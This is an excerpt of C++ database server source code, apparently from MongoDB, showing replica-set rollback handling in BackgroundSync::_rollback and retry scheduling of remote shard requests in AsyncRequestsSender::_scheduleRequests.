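    uassert(12345, "oplog collection is missing", oplogExists);  // throws UserException(12345, ...)
    return Status::OK();
}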
void BackgroundSync::_rollback(OperationContext* txn,
                               const HostAndPort& source,
                               stdx::function<DBClientBase*()> getConnection) {
    // Abort only when syncRollback detects we are in an unrecoverable state.
    // In other cases, we log the message contained in the error status and retry later.
    auto status = syncRollback(txn,
                               OplogInterfaceLocal(txn, rsOplogName),
                               RollbackSourceImpl(getConnection, source, rsOplogName),
                               _replCoord);
    if (status.isOK()) {
        // Tell the syncTail thread there is no new data by adding a sentinel to the buffer.
        _signalNoNewDataForApplier(txn);

        // Wait until the buffer is empty.
        // This is an indication that syncTail has removed the sentinel marker from the buffer
        // and reset its local lastAppliedOpTime via the replCoord.
        while (!_oplogBuffer->isEmpty()) {
            sleepmillis(10);
            if (inShutdown()) {
                return;
            }
        }

        // At this point we are about to leave rollback. Before we do, wait for any writes done
        // as part of rollback to be durable, and then do any necessary checks that we didn't
        // wind up rolling back something illegal. We must wait for the rollback to be durable
        // so that if we wind up shutting down uncleanly in response to something we rolled back
        // we know that we won't wind up right back in the same situation when we start back up
        // because the rollback wasn't durable.
        txn->recoveryUnit()->waitUntilDurable();

        // If we detected that we rolled back the shardIdentity document as part of this rollback
        // then we must shut down to clear the in-memory ShardingState associated with the
        // shardIdentity document.
        if (ShardIdentityRollbackNotifier::get(txn)->didRollbackHappen()) {
            severe() << "shardIdentity document rollback detected. Shutting down to clear "
                        "in-memory sharding state. Restarting this process should safely return it "
                        "to a healthy state";
            fassertFailedNoTrace(40276);
        }

        // It is now safe to clear the ROLLBACK state, which may result in the applier thread
        // transitioning to SECONDARY. This is safe because the applier thread has now reloaded
        // the new rollback minValid from the database.
        if (!_replCoord->setFollowerMode(MemberState::RS_RECOVERING)) {
            warning() << "Failed to transition into " << MemberState(MemberState::RS_RECOVERING)
                      << "; expected to be in state " << MemberState(MemberState::RS_ROLLBACK)
                      << " but found self in " << _replCoord->getMemberState();
        }
        return;
    }

    if (ErrorCodes::UnrecoverableRollbackError == status.code()) {
        fassertNoTrace(28723, status);
    }

    warning() << "rollback cannot proceed at this time (retrying later): " << redact(status);
}
void AsyncRequestsSender::_scheduleRequests() {
    invariant(!_stopRetrying);
    // Schedule remote work on hosts for which we have not sent a request or need to retry.
    for (size_t i = 0; i < _remotes.size(); ++i) {
        auto& remote = _remotes[i];

        // First check if the remote had a retriable error, and if so, clear its response field so
        // it will be retried.
        if (remote.swResponse && !remote.done) {
            // We check both the response status and command status for a retriable error.
            Status status = remote.swResponse->getStatus();
            if (status.isOK()) {
                status = getStatusFromCommandResult(remote.swResponse->getValue().data);
            }

            if (status.isOK()) {
                status = getWriteConcernStatusFromCommandResult(remote.swResponse->getValue().data);
            }

            if (!status.isOK()) {
                // There was an error with either the response or the command.
                auto shard = remote.getShard();
                if (!shard) {
                    remote.swResponse =
                        Status(ErrorCodes::ShardNotFound,
                               str::stream() << "Could not find shard " << remote.shardId);
                } else {
                    if (remote.shardHostAndPort) {
                        shard->updateReplSetMonitor(*remote.shardHostAndPort, status);
                    }
                    if (shard->isRetriableError(status.code(), _retryPolicy) &&
                        remote.retryCount < kMaxNumFailedHostRetryAttempts) {
                        LOG(1) << "Command to remote " << remote.shardId << " at host "
                               << *remote.shardHostAndPort
                               << " failed with retriable error and will be retried "
                               << causedBy(redact(status));
                        ++remote.retryCount;
                        remote.swResponse.reset();
                    }
                }
            }
        }

        // If the remote does not have a response or pending request, schedule remote work for it.
        if (!remote.swResponse && !remote.cbHandle.isValid()) {
            auto scheduleStatus = _scheduleRequest(i);
            if (!scheduleStatus.isOK()) {
                remote.swResponse = std::move(scheduleStatus);

                // Push a noop response to the queue to indicate that a remote is ready for
                // re-processing due to failure.
                _responseQueue.producer.push(boost::none);
            }
        }
    }
}